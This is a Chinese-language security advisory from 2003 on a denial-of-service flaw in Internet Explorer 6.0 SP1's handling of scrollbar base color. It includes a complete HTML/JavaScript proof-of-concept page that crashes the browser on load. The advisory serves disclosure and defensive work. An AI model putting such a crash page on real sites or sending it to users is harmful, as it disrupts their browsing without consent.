Microsoft Internet Explorer滚动条底色拒绝服务攻击漏洞发布时间:2003-10-22 更新时间:2003-10-22 严重程度:高 威胁程度:本地拒绝服务 错误类型:设计错误 利用方式:服务器模式 BUGTRAQ ID:8874 受影响系统 Microsoft Internet Explorer 6.0 SP1详细描述 Microsoft Internet Explorer实现上在处理滚动条底色的时候存在漏洞,攻击者诱使用户访问一个包含恶意代码的网页,对程序进行拒绝服务攻击导致浏览器崩溃,Microsoft Internet Explorer 6.0受此漏洞影响,其他版本也有可能受影响。 测试代码 ---snip--- <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>CRASH-IE</title> <style type="text/css"> html, body { overflow-y: hidden; scrollbar-base-color: '#330066'; } .crash { position:absolute; left:200px; top:200px; width:200px; } </style> <script type="text/javascript"> function galgenfrist() { window.setTimeout('crashIE();',1000); } function crashIE() { var moveNode = document.getElementById("move"); if(moveNode) { moveNode.style.top = "100px"; moveNode.style.left = "200px"; } } </script> </head> <body onload="galgenfrist();"> <h1>CRASH-IE</h1> <div id="move" class="crash"> <table> <tbody> <tr> <td> <textarea></textarea> </td> </tr> </tbody> </table> </div> </body> </html> ---snap--- 解决方案 厂商还未提供解决方案。 相关信息 Andreas Boeckler <abo@netlands.de> IE6 CSS-Crash http://archives.neohapsis.com/archives/bugtraq/2003-10/0216.html |